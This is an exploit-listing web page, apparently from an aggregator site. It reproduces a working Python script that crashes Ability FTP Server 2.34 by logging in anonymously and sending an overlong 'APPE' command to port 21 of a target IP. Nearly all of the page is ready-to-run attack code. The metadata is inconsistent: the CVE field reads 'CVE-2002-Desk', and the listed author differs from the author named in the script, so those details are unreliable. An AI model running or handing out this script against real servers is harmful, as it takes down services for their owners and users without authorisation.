Advertisement






Ability FTP Server 2.34 Denial Of Service

CVE Category Price Severity
CVE-2002-Desk CWE-20 $500 High
Author Risk Exploitation Type Date
Kaveh Razavi High Remote 2021-06-11
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060062

Below is a copy:

Ability FTP Server 2.34 Denial Of Service
#!/usr/bin/python
#
# e-mail: [email protected]
#
# Date: 06/10/2021 - 10 jun
#
# Version Vulnerable: Ability FTP Server 2.34
#
# OS Tested: Windows XP PACK 3 Brazilian

import socket
import sys

if len(sys.argv) != 2:
    print "########################################################"
    print "#                                                                                                            #"
    print "#  Ability FTP Server 2.34 -- Command 'APPE' Denied of Service        #"
    print "#                                                                                                            #"
    print "#              Author: Fernando Mengali                                                    #"
    print "#                                                                                                            #"
    print "#              Usage: exploit.py <IP>                                                         #" 
    print "#                                                                                                            #"
    print "########################################################"
    sys.exit(1)
  
target = sys.argv[1]

payload = "A"*1000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect = s.connect((target, 21))
    print "[+] Conectado com sucesso"
except:
    print "[-] Falha ao conectar para o servidor..."
    sys.exit(0)
s.recv(1024)
print "[+] Autenticando..." 
s.send('User anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
print "[+] Enviando pacote crafted..."
s.send('APPE '+payload+'\r\n')
s.close()

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.